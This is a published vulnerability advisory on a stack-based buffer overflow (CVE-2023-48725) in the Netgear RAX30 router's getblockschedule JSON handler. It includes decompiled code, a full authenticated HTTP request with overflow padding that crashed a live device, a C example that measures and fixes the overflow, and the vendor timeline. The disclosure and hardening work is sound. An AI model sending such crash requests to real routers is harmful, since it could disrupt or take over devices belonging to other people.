Talos Vulnerability Report

TALOS-2023-1887

Netgear RAX30 JSON Parsing getblockschedule() stack-based buffer overflow vulnerability

March 7, 2024
CVE Number

CVE-2023-48725

SUMMARY

A stack-based buffer overflow vulnerability exists in the JSON Parsing getblockschedule() functionality of Netgear RAX30 1.0.11.96 and 1.0.7.78. A specially crafted HTTP request can lead to code execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear RAX30 1.0.11.96
Netgear RAX30 1.0.7.78

PRODUCT URLS

RAX30 - https://www.netgear.com/support/product/rax30

CVSSv3 SCORE

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-121 - Stack-based Buffer Overflow

DETAILS

The AX2400 WiFi Router (RAX30) is a consumer home router made by Netgear.

The vulnerability is in the getblockschedule function, which the binary's main function dispatches through a function lookup table keyed on the "function" name carried in the JSON request body.

int32_t getblockschedule(struct json_object* json_obj)
{
    ...
    char s_3[0x100];                                          // 256-byte stack buffer
    // json_object_object_get_ex() returns 0 when no "message" key is present ...
    if (json_object_object_get_ex(json_obj, "message", &message_output) == 0)
    {
        // ... and the whole serialized object is then copied with no length check.
        cmsUtl_strcpy(&s_3, json_object_get_string(json_obj)); // unbounded strcpy to static size buffer.
    }
    ...
}

This was triggered on a live device with the following payload:

POST /cgi-bin/rex_cgi?csrftoken=2053576656 HTTP/1.1
Host: 192.168.1.1
Content-Length: 999
Authorization: Basic YWRtaW46R00kY3ByMjdhYQ==
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Content-Type: application/json; charset=UTF-8
Origin: http://192.168.1.1
Referer: http://192.168.1.1/DEV_name.html
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: session=Xa7mGpxoQNBlU9YObP5Yhga9HGgtDQIY
Connection: close

{"function":"getblockschedule","data":{"notamesg":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}}

This request crashes the handling process on the device (the rex_cgi handler the request is posted to): the serialized data object is copied by a strcpy with no length check into a 0x100-byte stack buffer. The vulnerable path is taken whenever the data object passed to getblockschedule contains no "message" key, as with the "notamesg" key above; the serialized object, and therefore the length of the copy, is entirely attacker-controlled.
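The following is an added example, not code from Netgear's firmware or from the Talos report. It models the branch described above with a constructed stand-in for a json-c object (the hypothetical fake_json type and fake_json_* helpers), assumes cmsUtl_strcpy behaves like a plain strcpy (NUL terminator included), and shows two things a practitioner wants at hand: a check that computes, for a given data object, how far the advisory's copy would run past the 0x100-byte s_3 buffer, and a bounded replacement for that copy that rejects oversized input instead of overflowing. The 999-byte "notamesg" value is the trigger from the request above, rebuilt inline.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SCHED_BUF_SIZE 0x100   /* the 256-byte s_3 stack buffer from the advisory */

/* Constructed stand-in for a json-c object: up to 8 flat string key/value
 * pairs. Hypothetical type, present only so the example runs without json-c. */
struct fake_json {
    const char *keys[8];
    const char *values[8];
    int count;
};

/* Models json_object_object_get_ex(obj, key, &out): 1 if the key exists. */
static int fake_json_has_key(const struct fake_json *obj, const char *key)
{
    for (int i = 0; i < obj->count; i++)
        if (strcmp(obj->keys[i], key) == 0)
            return 1;
    return 0;
}

/* Models json_object_get_string() on an object: its serialized text, e.g.
 * {"notamesg":"aaaa"}. Heap-allocated; caller frees. */
static char *fake_json_serialize(const struct fake_json *obj)
{
    size_t need = 3;                              /* '{', '}', NUL */
    for (int i = 0; i < obj->count; i++)          /* "k":"v", per pair */
        need += strlen(obj->keys[i]) + strlen(obj->values[i]) + 6;
    char *out = malloc(need);
    if (!out)
        return NULL;
    char *p = out;
    *p++ = '{';
    for (int i = 0; i < obj->count; i++)
        p += sprintf(p, "%s\"%s\":\"%s\"", i ? "," : "",
                     obj->keys[i], obj->values[i]);
    *p++ = '}';
    *p = '\0';
    return out;
}

/* Mirrors the advisory's branch: with no "message" key, the whole serialized
 * object goes through an unbounded strcpy into s_3. Instead of performing that
 * copy, report how many bytes it would write past the buffer (0 = fits). */
int getblockschedule_overflow_bytes(const struct fake_json *data)
{
    if (fake_json_has_key(data, "message"))
        return 0;                                 /* other branch, not the bug */
    char *s = fake_json_serialize(data);
    if (!s)
        return -1;
    size_t len = strlen(s) + 1;                   /* strcpy copies the NUL too */
    free(s);
    return len > SCHED_BUF_SIZE ? (int)(len - SCHED_BUF_SIZE) : 0;
}

/* Hardened replacement for the copy: explicit bound, always NUL-terminated,
 * and oversized input is rejected (-1) rather than silently truncated. */
int getblockschedule_hardened(const struct fake_json *data,
                              char *out, size_t out_size)
{
    if (out_size == 0)
        return -1;
    out[0] = '\0';
    if (fake_json_has_key(data, "message"))
        return 0;
    char *s = fake_json_serialize(data);
    if (!s)
        return -1;
    size_t len = strlen(s);
    int rc = -1;
    if (len < out_size) {                         /* room for text plus NUL */
        memcpy(out, s, len + 1);
        rc = 0;
    }
    free(s);
    return rc;
}

/* Builds the advisory's trigger value: n repeated 'a' characters. Caller frees. */
char *make_padding(size_t n)
{
    char *p = malloc(n + 1);
    if (!p)
        return NULL;
    memset(p, 'a', n);
    p[n] = '\0';
    return p;
}

int main(void)
{
    char *pad = make_padding(999);                /* Content-Length 999 in the PoC */
    struct fake_json trigger = { .keys = {"notamesg"}, .values = {pad}, .count = 1 };
    char s_3[SCHED_BUF_SIZE];

    printf("bytes written past s_3 by the original copy: %d\n",
           getblockschedule_overflow_bytes(&trigger));
    printf("hardened copy result: %d\n",
           getblockschedule_hardened(&trigger, s_3, sizeof s_3));
    free(pad);
    return 0;
}
```

For the 999-byte trigger the serialized object is 1014 characters, so the original copy writes 1015 bytes (with NUL) into a 256-byte buffer, 759 bytes past its end; the hardened variant returns -1 and leaves the buffer empty. Truncating silently is deliberately not offered as the fix: a schedule string cut at 255 bytes is still malformed input, and rejecting it keeps the failure visible.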

VENDOR RESPONSE

Vendor advisory: https://kb.netgear.com/000066037/Security-Advisory-for-Post-Authentication-Stack-Overflow-on-the-RAX30-PSV-2023-0160

TIMELINE

2023-12-06 - Vendor Disclosure
2024-03-06 - Vendor Patch Release
2024-03-07 - Public Release

Credit

Discovered by Michael Gentile of Cisco Talos